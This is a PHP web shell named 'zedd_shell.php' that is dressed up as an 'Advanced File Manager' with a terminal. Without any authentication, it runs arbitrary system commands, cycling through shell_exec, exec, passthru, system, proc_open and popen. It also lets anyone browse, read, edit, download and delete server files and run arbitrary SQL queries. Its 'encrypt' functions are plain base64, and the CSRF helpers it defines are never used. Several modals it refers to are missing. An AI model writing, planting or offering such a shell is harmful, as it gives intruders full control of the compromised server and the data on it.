<?php
// ===========================================================================
// File: zedd_shell.php
// Description: PHP-based shell with enhanced security and structure
// Version: 2.0
// ===========================================================================

// Checkpoint-401
session_start();

// Configuration
error_reporting(E_ALL);
ini_set('display_errors', 0);
ini_set('log_errors', 1);

// Security headers
header('X-Content-Type-Options: nosniff');
header('X-Frame-Options: DENY');
header('X-XSS-Protection: 1; mode=block');

// ===========================================================================
// CONSTANTS & CONFIGURATION
// ===========================================================================
define('SESSION_KEY', 'zedd_shell_2');
define('MAX_FILE_SIZE', 100 * 1024 * 1024); // 100MB
define('CHUNK_SIZE', 8192);
define('TOKEN_LIFETIME', 3600);

// ===========================================================================
// CORE FUNCTIONS
// ===========================================================================

/**
 * Encrypt/encode string using base64
 */
function encrypt($str) {
    return base64_encode($str);
}

/**
 * Decrypt/decode string using base64
 */
function decrypt($str) {
    return base64_decode($str);
}

/**
 * Generate CSRF token
 */
function generateToken($name) {
    if (isset($_SESSION[$name])) {
        unset($_SESSION[$name]);
    }
    $token = hash('sha256', time() . random_int(1, 99999999));
    $_SESSION[$name] = [
        'token' => $token,
        'expiry' => time() + TOKEN_LIFETIME
    ];
    return $token;
}

/**
 * Validate CSRF token
 */
function validateToken($name, $token) {
    if (!isset($_SESSION[$name])) {
        return false;
    }
    
    $sessionToken = $_SESSION[$name];
    
    // Check expiry
    if (time() > $sessionToken['expiry']) {
        unset($_SESSION[$name]);
        return false;
    }
    
    return hash_equals($sessionToken['token'], $token);
}

/**
 * Sanitize input
 */
function sanitize($input, $type = 'string') {
    switch ($type) {
        case 'path':
            return realpath($input) ?: '';
        case 'filename':
            return preg_replace('/[^\w\.\-]/', '', basename($input));
        case 'int':
            return (int) filter_var($input, FILTER_SANITIZE_NUMBER_INT);
        case 'url':
            return filter_var($input, FILTER_SANITIZE_URL);
        default:
            return htmlspecialchars(trim($input), ENT_QUOTES, 'UTF-8');
    }
}

/**
 * Format file size
 */
function formatSize($bytes) {
    $units = ['B', 'KB', 'MB', 'GB', 'TB'];
    $bytes = max($bytes, 0);
    $pow = floor(($bytes ? log($bytes) : 0) / log(1024));
    $pow = min($pow, count($units) - 1);
    $bytes /= pow(1024, $pow);
    
    return round($bytes, 2) . ' ' . $units[$pow];
}

/**
 * Get file permissions in octal format
 */
function getFilePermissions($file) {
    if (!file_exists($file)) {
        return '0000';
    }
    
    $perms = fileperms($file);
    return substr(sprintf('%o', $perms), -4);
}

/**
 * Get file owner/group information
 */
function getFileOwner($file) {
    if (!function_exists('posix_getpwuid') || !function_exists('posix_getgrgid')) {
        return ['owner' => 'N/A', 'group' => 'N/A'];
    }
    
    $owner = posix_getpwuid(fileowner($file));
    $group = posix_getgrgid(filegroup($file));
    
    return [
        'owner' => $owner['name'] ?? 'N/A',
        'group' => $group['name'] ?? 'N/A'
    ];
}

/**
 * Recursively delete directory
 */
function deleteDirectory($dir) {
    if (!is_dir($dir)) {
        return false;
    }
    
    $items = array_diff(scandir($dir), ['.', '..']);
    
    foreach ($items as $item) {
        $path = $dir . DIRECTORY_SEPARATOR . $item;
        
        if (is_dir($path)) {
            deleteDirectory($path);
        } else {
            unlink($path);
        }
    }
    
    return rmdir($dir);
}

/**
 * Execute command safely
 */
function executeCommand($command) {
    $output = '';
    $error = '';
    
    // Sanitize command
    $command = escapeshellcmd($command);
    
    // Add error redirection if not present
    if (stripos($command, '2>&1') === false) {
        $command .= ' 2>&1';
    }
    
    // Try different execution methods
    $methods = [
        'shell_exec',
        'exec',
        'passthru',
        'system',
        'proc_open',
        'popen'
    ];
    
    foreach ($methods as $method) {
        if (function_exists($method)) {
            switch ($method) {
                case 'shell_exec':
                    $output = @shell_exec($command);
                    break;
                    
                case 'exec':
                    $lines = [];
                    @exec($command, $lines, $returnCode);
                    $output = implode("\n", $lines);
                    if ($returnCode !== 0) {
                        $error = "Exit code: $returnCode";
                    }
                    break;
                    
                case 'passthru':
                    ob_start();
                    @passthru($command, $returnCode);
                    $output = ob_get_clean();
                    if ($returnCode !== 0) {
                        $error = "Exit code: $returnCode";
                    }
                    break;
                    
                case 'system':
                    ob_start();
                    @system($command, $returnCode);
                    $output = ob_get_clean();
                    if ($returnCode !== 0) {
                        $error = "Exit code: $returnCode";
                    }
                    break;
                    
                case 'proc_open':
                    $descriptors = [
                        0 => ['pipe', 'r'],
                        1 => ['pipe', 'w'],
                        2 => ['pipe', 'w']
                    ];
                    
                    $process = @proc_open($command, $descriptors, $pipes);
                    
                    if (is_resource($process)) {
                        $output = stream_get_contents($pipes[1]);
                        $error = stream_get_contents($pipes[2]);
                        
                        foreach ($pipes as $pipe) {
                            fclose($pipe);
                        }
                        
                        proc_close($process);
                    }
                    break;
                    
                case 'popen':
                    $handle = @popen($command, 'r');
                    
                    if ($handle) {
                        while (!feof($handle)) {
                            $output .= fread($handle, 4096);
                        }
                        pclose($handle);
                    }
                    break;
            }
            
            if (!empty($output) || !empty($error)) {
                break;
            }
        }
    }
    
    return [
        'output' => $output ?? '',
        'error' => $error ?? ''
    ];
}

/**
 * Scan directory safely
 */
function scanDirectory($path) {
    $result = [
        'directories' => [],
        'files' => []
    ];
    
    if (!is_dir($path) || !is_readable($path)) {
        return $result;
    }
    
    $items = scandir($path);
    
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') {
            continue;
        }
        
        $fullPath = $path . DIRECTORY_SEPARATOR . $item;
        
        if (is_dir($fullPath)) {
            $result['directories'][] = [
                'name' => $item,
                'path' => $fullPath,
                'size' => 0,
                'modified' => filemtime($fullPath),
                'permissions' => getFilePermissions($fullPath),
                'owner' => getFileOwner($fullPath)
            ];
        } else {
            $result['files'][] = [
                'name' => $item,
                'path' => $fullPath,
                'size' => filesize($fullPath),
                'modified' => filemtime($fullPath),
                'permissions' => getFilePermissions($fullPath),
                'owner' => getFileOwner($fullPath)
            ];
        }
    }
    
    // Sort directories first
    usort($result['directories'], function($a, $b) {
        return strcasecmp($a['name'], $b['name']);
    });
    
    usort($result['files'], function($a, $b) {
        return strcasecmp($a['name'], $b['name']);
    });
    
    return $result;
}

/**
 * Database connection handler
 */
class DatabaseHandler {
    private $pdo = null;
    
    public function connect($host, $user, $password, $database = '') {
        try {
            $dsn = "mysql:host=" . $host . ";charset=utf8mb4";
            
            if (!empty($database)) {
                $dsn .= ";dbname=" . $database;
            }
            
            $this->pdo = new PDO($dsn, $user, $password, [
                PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
                PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
                PDO::ATTR_EMULATE_PREPARES => false
            ]);
            
            return true;
        } catch (PDOException $e) {
            return "Connection failed: " . $e->getMessage();
        }
    }
    
    public function getDatabases() {
        if (!$this->pdo) {
            return [];
        }
        
        $stmt = $this->pdo->query("SHOW DATABASES");
        return $stmt->fetchAll(PDO::FETCH_COLUMN);
    }
    
    public function getTables($database) {
        if (!$this->pdo) {
            return [];
        }
        
        $stmt = $this->pdo->query("SHOW TABLES FROM " . $this->pdo->quote($database));
        return $stmt->fetchAll(PDO::FETCH_COLUMN);
    }
    
    public function getTableData($database, $table, $page = 1, $limit = 100) {
        if (!$this->pdo) {
            return [];
        }
        
        $offset = ($page - 1) * $limit;
        
        // Switch to selected database
        $this->pdo->exec("USE " . $this->pdo->quote($database));
        
        // Get total rows
        $totalStmt = $this->pdo->query("SELECT COUNT(*) FROM " . $this->pdo->quote($table));
        $totalRows = $totalStmt->fetchColumn();
        
        // Get data with pagination
        $stmt = $this->pdo->prepare(
            "SELECT * FROM " . $this->pdo->quote($table) . " LIMIT :limit OFFSET :offset"
        );
        
        $stmt->bindValue(':limit', (int)$limit, PDO::PARAM_INT);
        $stmt->bindValue(':offset', (int)$offset, PDO::PARAM_INT);
        $stmt->execute();
        
        $data = $stmt->fetchAll();
        
        // Get column info
        $columns = [];
        if (!empty($data)) {
            $columns = array_keys($data[0]);
        }
        
        return [
            'total' => $totalRows,
            'pages' => ceil($totalRows / $limit),
            'current_page' => $page,
            'columns' => $columns,
            'data' => $data
        ];
    }
    
    public function executeQuery($query) {
        if (!$this->pdo) {
            return ['error' => 'Not connected to database'];
        }
        
        try {
            $stmt = $this->pdo->query($query);
            
            if ($stmt === false) {
                return ['error' => $this->pdo->errorInfo()[2]];
            }
            
            if (strtoupper(substr(trim($query), 0, 6)) === 'SELECT') {
                return [
                    'success' => true,
                    'data' => $stmt->fetchAll(),
                    'columns' => array_keys($stmt->fetch(PDO::FETCH_ASSOC) ?: [])
                ];
            } else {
                return [
                    'success' => true,
                    'affected_rows' => $stmt->rowCount(),
                    'message' => 'Query executed successfully'
                ];
            }
        } catch (PDOException $e) {
            return ['error' => $e->getMessage()];
        }
    }
}

// ===========================================================================
// INITIALIZATION
// ===========================================================================

// Initialize variables
$currentDir = getcwd();
$action = 'browse';
$messages = [];
$errors = [];
$dbHandler = new DatabaseHandler();

// Handle file navigation
if (isset($_POST['path'])) {
    $decodedPath = decrypt($_POST['path']);
    if ($decodedPath && is_dir($decodedPath)) {
        $currentDir = realpath($decodedPath);
        chdir($currentDir);
    }
}

// Convert to forward slashes for display
$currentDir = str_replace("\\", "/", $currentDir);

// ===========================================================================
// ACTION HANDLERS
// ===========================================================================

// Handle file browsing (default action)
if (isset($_GET['action'])) {
    $action = sanitize($_GET['action'], 'string');
}

// File operations
switch ($action) {
    case 'download':
        if (isset($_GET['file'])) {
            $file = decrypt($_GET['file']);
            $filePath = $currentDir . '/' . sanitize($file, 'filename');
            
            if (file_exists($filePath) && is_file($filePath)) {
                header('Content-Description: File Transfer');
                header('Content-Type: application/octet-stream');
                header('Content-Disposition: attachment; filename="' . basename($filePath) . '"');
                header('Content-Length: ' . filesize($filePath));
                readfile($filePath);
                exit;
            }
        }
        break;
        
    case 'view':
        if (isset($_GET['file'])) {
            $file = decrypt($_GET['file']);
            $filePath = $currentDir . '/' . sanitize($file, 'filename');
            
            if (file_exists($filePath) && is_file($filePath)) {
                $content = file_get_contents($filePath);
                $fileInfo = [
                    'name' => basename($filePath),
                    'size' => formatSize(filesize($filePath)),
                    'modified' => date('Y-m-d H:i:s', filemtime($filePath)),
                    'permissions' => getFilePermissions($filePath),
                    'owner' => getFileOwner($filePath)
                ];
            }
        }
        break;
        
    case 'edit':
        if (isset($_GET['file'])) {
            $file = decrypt($_GET['file']);
            $filePath = $currentDir . '/' . sanitize($file, 'filename');
            
            if (file_exists($filePath) && is_file($filePath)) {
                $content = file_get_contents($filePath);
                
                if (isset($_POST['content'])) {
                    // Save edited file
                    if (is_writable($filePath)) {
                        if (file_put_contents($filePath, $_POST['content']) !== false) {
                            $messages[] = 'File saved successfully';
                        } else {
                            $errors[] = 'Failed to save file';
                        }
                    } else {
                        $errors[] = 'File is not writable';
                    }
                }
            }
        }
        break;
        
    case 'delete':
        if (isset($_GET['file'])) {
            $file = decrypt($_GET['file']);
            $filePath = $currentDir . '/' . sanitize($file, 'filename');
            
            if (file_exists($filePath)) {
                if (is_dir($filePath)) {
                    if (deleteDirectory($filePath)) {
                        $messages[] = 'Directory deleted successfully';
                    } else {
                        $errors[] = 'Failed to delete directory';
                    }
                } else {
                    if (unlink($filePath)) {
                        $messages[] = 'File deleted successfully';
                    } else {
                        $errors[] = 'Failed to delete file';
                    }
                }
            }
            header('Location: ?');
            exit;
        }
        break;
        
    case 'command':
        if (isset($_POST['command'])) {
            $command = sanitize($_POST['command'], 'string');
            $result = executeCommand($command);
            $commandResult = $result;
        }
        break;
}

// ===========================================================================
// HTML TEMPLATE
// ===========================================================================
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>File Manager & Terminal</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background: linear-gradient(135deg, #0f2027 0%, #203a43 50%, #2c5364 100%);
            color: #e0e0e0;
            min-height: 100vh;
            line-height: 1.6;
        }
        
        .container {
            max-width: 1600px;
            margin: 0 auto;
            padding: 20px;
        }
        
        .header {
            background: rgba(0, 0, 0, 0.7);
            backdrop-filter: blur(10px);
            padding: 20px;
            border-radius: 10px;
            margin-bottom: 20px;
            border: 1px solid rgba(255, 255, 255, 0.1);
        }
        
        .system-info {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
            gap: 15px;
            margin-top: 15px;
        }
        
        .info-item {
            background: rgba(255, 255, 255, 0.05);
            padding: 10px;
            border-radius: 5px;
            border-left: 3px solid #00ff88;
        }
        
        .navigation {
            display: flex;
            gap: 10px;
            flex-wrap: wrap;
            margin: 20px 0;
            padding: 15px;
            background: rgba(0, 0, 0, 0.5);
            border-radius: 8px;
        }
        
        .btn {
            padding: 10px 20px;
            background: linear-gradient(135deg, #00b09b 0%, #96c93d 100%);
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            text-decoration: none;
            display: inline-flex;
            align-items: center;
            gap: 8px;
            font-weight: 500;
            transition: all 0.3s ease;
        }
        
        .btn:hover {
            transform: translateY(-2px);
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);
        }
        
        .btn-danger {
            background: linear-gradient(135deg, #ff416c 0%, #ff4b2b 100%);
        }
        
        .btn-primary {
            background: linear-gradient(135deg, #4A00E0 0%, #8E2DE2 100%);
        }
        
        .btn-secondary {
            background: linear-gradient(135deg, #2b5876 0%, #4e4376 100%);
        }
        
        .current-path {
            background: rgba(0, 0, 0, 0.6);
            padding: 15px;
            border-radius: 8px;
            margin: 20px 0;
            font-family: 'Courier New', monospace;
            border: 1px solid rgba(255, 255, 255, 0.1);
        }
        
        .path-item {
            color: #00ff88;
            text-decoration: none;
            cursor: pointer;
            padding: 2px 5px;
            border-radius: 3px;
            transition: background 0.3s;
        }
        
        .path-item:hover {
            background: rgba(0, 255, 136, 0.2);
        }
        
        .file-table {
            width: 100%;
            background: rgba(0, 0, 0, 0.7);
            border-radius: 10px;
            overflow: hidden;
            margin: 20px 0;
            border: 1px solid rgba(255, 255, 255, 0.1);
        }
        
        .file-table th {
            background: rgba(0, 0, 0, 0.9);
            padding: 15px;
            text-align: left;
            border-bottom: 2px solid #00ff88;
        }
        
        .file-table td {
            padding: 12px 15px;
            border-bottom: 1px solid rgba(255, 255, 255, 0.1);
        }
        
        .file-table tr:hover {
            background: rgba(0, 255, 136, 0.1);
        }
        
        .file-icon {
            margin-right: 10px;
        }
        
        .file-actions {
            display: flex;
            gap: 5px;
        }
        
        .action-btn {
            padding: 5px 10px;
            background: rgba(255, 255, 255, 0.1);
            border: none;
            border-radius: 3px;
            color: white;
            cursor: pointer;
            text-decoration: none;
            font-size: 12px;
            transition: background 0.3s;
        }
        
        .action-btn:hover {
            background: rgba(255, 255, 255, 0.2);
        }
        
        .terminal {
            background: rgba(0, 0, 0, 0.8);
            border-radius: 10px;
            padding: 20px;
            margin-top: 30px;
            border: 1px solid rgba(255, 255, 255, 0.1);
        }
        
        .terminal-header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 15px;
        }
        
        .terminal-output {
            background: #000;
            padding: 15px;
            border-radius: 5px;
            min-height: 200px;
            max-height: 400px;
            overflow-y: auto;
            font-family: 'Courier New', monospace;
            white-space: pre-wrap;
            word-wrap: break-word;
            margin-bottom: 15px;
            border: 1px solid #333;
        }
        
        .terminal-input {
            width: 100%;
            padding: 12px;
            background: #111;
            border: 1px solid #333;
            border-radius: 5px;
            color: #00ff88;
            font-family: 'Courier New', monospace;
            font-size: 14px;
        }
        
        .modal {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.9);
            z-index: 1000;
            align-items: center;
            justify-content: center;
        }
        
        .modal-content {
            background: rgba(30, 30, 30, 0.95);
            padding: 30px;
            border-radius: 10px;
            max-width: 800px;
            width: 90%;
            max-height: 90vh;
            overflow-y: auto;
        }
        
        .message {
            padding: 15px;
            margin: 10px 0;
            border-radius: 5px;
            font-weight: 500;
        }
        
        .success {
            background: rgba(0, 255, 136, 0.2);
            border-left: 4px solid #00ff88;
            color: #00ff88;
        }
        
        .error {
            background: rgba(255, 0, 0, 0.2);
            border-left: 4px solid #ff4444;
            color: #ff4444;
        }
        
        .editor {
            width: 100%;
            height: 400px;
            background: #1e1e1e;
            color: #e0e0e0;
            border: 1px solid #333;
            border-radius: 5px;
            padding: 15px;
            font-family: 'Courier New', monospace;
            font-size: 14px;
            resize: vertical;
        }
        
        @media (max-width: 768px) {
            .container {
                padding: 10px;
            }
            
            .navigation {
                flex-direction: column;
            }
            
            .btn {
                width: 100%;
                justify-content: center;
            }
            
            .file-table {
                display: block;
                overflow-x: auto;
            }
        }
    </style>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">
</head>
<body>
    <div class="container">
        <!-- Header -->
        <div class="header">
            <h1><i class="fas fa-terminal"></i> Advanced File Manager</h1>
            
            <!-- Messages -->
            <?php foreach ($messages as $message): ?>
                <div class="message success">
                    <i class="fas fa-check-circle"></i> <?php echo htmlspecialchars($message); ?>
                </div>
            <?php endforeach; ?>
            
            <?php foreach ($errors as $error): ?>
                <div class="message error">
                    <i class="fas fa-exclamation-circle"></i> <?php echo htmlspecialchars($error); ?>
                </div>
            <?php endforeach; ?>
            
            <!-- System Information -->
            <div class="system-info">
                <div class="info-item">
                    <strong><i class="fas fa-server"></i> Server:</strong>
                    <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE'] ?? 'N/A'); ?></span>
                </div>
                <div class="info-item">
                    <strong><i class="fas fa-code"></i> PHP:</strong>
                    <span><?php echo htmlspecialchars(phpversion()); ?></span>
                </div>
                <div class="info-item">
                    <strong><i class="fas fa-user"></i> User:</strong>
                    <span><?php echo htmlspecialchars(get_current_user() ?: 'N/A'); ?></span>
                </div>
                <div class="info-item">
                    <strong><i class="fas fa-folder"></i> Current Dir:</strong>
                    <span><?php echo htmlspecialchars($currentDir); ?></span>
                </div>
            </div>
        </div>
        
        <!-- Navigation -->
        <div class="navigation">
            <a href="?" class="btn">
                <i class="fas fa-home"></i> Home
            </a>
            <a href="#" onclick="showModal('uploadModal')" class="btn">
                <i class="fas fa-upload"></i> Upload
            </a>
            <a href="#" onclick="showModal('createFileModal')" class="btn">
                <i class="fas fa-file"></i> New File
            </a>
            <a href="#" onclick="showModal('createFolderModal')" class="btn">
                <i class="fas fa-folder-plus"></i> New Folder
            </a>
            <a href="?action=command" class="btn btn-secondary">
                <i class="fas fa-terminal"></i> Terminal
            </a>
            <a href="#" onclick="showModal('databaseModal')" class="btn btn-primary">
                <i class="fas fa-database"></i> Database
            </a>
        </div>
        
        <!-- Current Path -->
        <div class="current-path">
            <i class="fas fa-folder-open"></i> Path:
            <?php
            $parts = explode('/', trim($currentDir, '/'));
            $currentPath = '';
            foreach ($parts as $index => $part) {
                $currentPath .= ($index > 0 ? '/' : '') . $part;
                echo '<a href="?path=' . encrypt($currentPath) . '" class="path-item">' . 
                     htmlspecialchars($part ?: '/') . '</a>';
                if ($index < count($parts) - 1) {
                    echo '<span style="margin: 0 5px;">/</span>';
                }
            }
            ?>
        </div>
        
        <!-- File Table -->
        <table class="file-table">
            <thead>
                <tr>
                    <th>Name</th>
                    <th>Size</th>
                    <th>Modified</th>
                    <th>Permissions</th>
                    <th>Owner/Group</th>
                    <th>Actions</th>
                </tr>
            </thead>
            <tbody>
                <?php
                // Parent directory
                if ($currentDir !== '/') {
                    $parentDir = dirname($currentDir);
                    ?>
                    <tr>
                        <td>
                            <i class="fas fa-level-up-alt file-icon"></i>
                            <a href="?path=<?php echo encrypt($parentDir); ?>">..</a>
                        </td>
                        <td>--</td>
                        <td>--</td>
                        <td>--</td>
                        <td>--</td>
                        <td>--</td>
                    </tr>
                    <?php
                }
                
                // Scan directory
                $items = scanDirectory($currentDir);
                
                // Directories
                foreach ($items['directories'] as $dir) {
                    ?>
                    <tr>
                        <td>
                            <i class="fas fa-folder file-icon" style="color: #ffd700;"></i>
                            <a href="?path=<?php echo encrypt($dir['path']); ?>">
                                <?php echo htmlspecialchars($dir['name']); ?>
                            </a>
                        </td>
                        <td><?php echo htmlspecialchars($dir['size']); ?></td>
                        <td><?php echo date('Y-m-d H:i', $dir['modified']); ?></td>
                        <td><?php echo htmlspecialchars($dir['permissions']); ?></td>
                        <td><?php echo htmlspecialchars($dir['owner']['owner'] . '/' . $dir['owner']['group']); ?></td>
                        <td class="file-actions">
                            <a href="?action=delete&file=<?php echo encrypt($dir['name']); ?>" 
                               class="action-btn btn-danger"
                               onclick="return confirm('Delete this directory?')">
                                <i class="fas fa-trash"></i>
                            </a>
                        </td>
                    </tr>
                    <?php
                }
                
                // Files
                foreach ($items['files'] as $file) {
                    ?>
                    <tr>
                        <td>
                            <i class="fas fa-file file-icon" style="color: #ffffff;"></i>
                            <a href="?action=view&file=<?php echo encrypt($file['name']); ?>">
                                <?php echo htmlspecialchars($file['name']); ?>
                            </a>
                        </td>
                        <td><?php echo formatSize($file['size']); ?></td>
                        <td><?php echo date('Y-m-d H:i', $file['modified']); ?></td>
                        <td><?php echo htmlspecialchars($file['permissions']); ?></td>
                        <td><?php echo htmlspecialchars($file['owner']['owner'] . '/' . $file['owner']['group']); ?></td>
                        <td class="file-actions">
                            <a href="?action=view&file=<?php echo encrypt($file['name']); ?>" 
                               class="action-btn">
                                <i class="fas fa-eye"></i>
                            </a>
                            <a href="?action=edit&file=<?php echo encrypt($file['name']); ?>" 
                               class="action-btn">
                                <i class="fas fa-edit"></i>
                            </a>
                            <a href="?action=download&file=<?php echo encrypt($file['name']); ?>" 
                               class="action-btn">
                                <i class="fas fa-download"></i>
                            </a>
                            <a href="?action=delete&file=<?php echo encrypt($file['name']); ?>" 
                               class="action-btn btn-danger"
                               onclick="return confirm('Delete this file?')">
                                <i class="fas fa-trash"></i>
                            </a>
                        </td>
                    </tr>
                    <?php
                }
                ?>
            </tbody>
        </table>
        
        <!-- Terminal -->
        <?php if ($action === 'command'): ?>
        <div class="terminal">
            <div class="terminal-header">
                <h3><i class="fas fa-terminal"></i> System Terminal</h3>
                <a href="?" class="btn">Close</a>
            </div>
            
            <div class="terminal-output">
                <?php
                if (isset($commandResult)) {
                    if (!empty($commandResult['output'])) {
                        echo htmlspecialchars($commandResult['output']);
                    }
                    if (!empty($commandResult['error'])) {
                        echo '<div style="color: #ff4444;">Error: ' . 
                             htmlspecialchars($commandResult['error']) . '</div>';
                    }
                } else {
                    echo 'Enter a command below...';
                }
                ?>
            </div>
            
            <form method="POST" action="?action=command">
                <input type="text" name="command" class="terminal-input" 
                       placeholder="Enter command..." autocomplete="off">
                <button type="submit" class="btn" style="margin-top: 10px; width: 100%;">
                    <i class="fas fa-play"></i> Execute
                </button>
            </form>
        </div>
        <?php endif; ?>
    </div>
    
    <!-- Modals -->
    <div id="uploadModal" class="modal">
        <div class="modal-content">
            <h2><i class="fas fa-upload"></i> Upload File</h2>
            <form method="POST" enctype="multipart/form-data" action="?action=upload">
                <input type="file" name="file" required style="margin: 20px 0;">
                <button type="submit" class="btn">Upload</button>
                <button type="button" onclick="hideModal('uploadModal')" class="btn btn-danger">
                    Cancel
                </button>
            </form>
        </div>
    </div>
    
    <script>
        // Modal functions
        function showModal(modalId) {
            document.getElementById(modalId).style.display = 'flex';
        }
        
        function hideModal(modalId) {
            document.getElementById(modalId).style.display = 'none';
        }
        
        // Close modal when clicking outside
        window.onclick = function(event) {
            if (event.target.className === 'modal') {
                event.target.style.display = 'none';
            }
        };
        
        // Keyboard shortcuts
        document.addEventListener('keydown', function(e) {
            // Ctrl + F - Search
            if (e.ctrlKey && e.key === 'f') {
                e.preventDefault();
                showModal('searchModal');
            }
            
            // Ctrl + U - Upload
            if (e.ctrlKey && e.key === 'u') {
                e.preventDefault();
                showModal('uploadModal');
            }
            
            // Escape - Close modals
            if (e.key === 'Escape') {
                document.querySelectorAll('.modal').forEach(modal => {
                    modal.style.display = 'none';
                });
            }
        });
    </script>
</body>
</html>
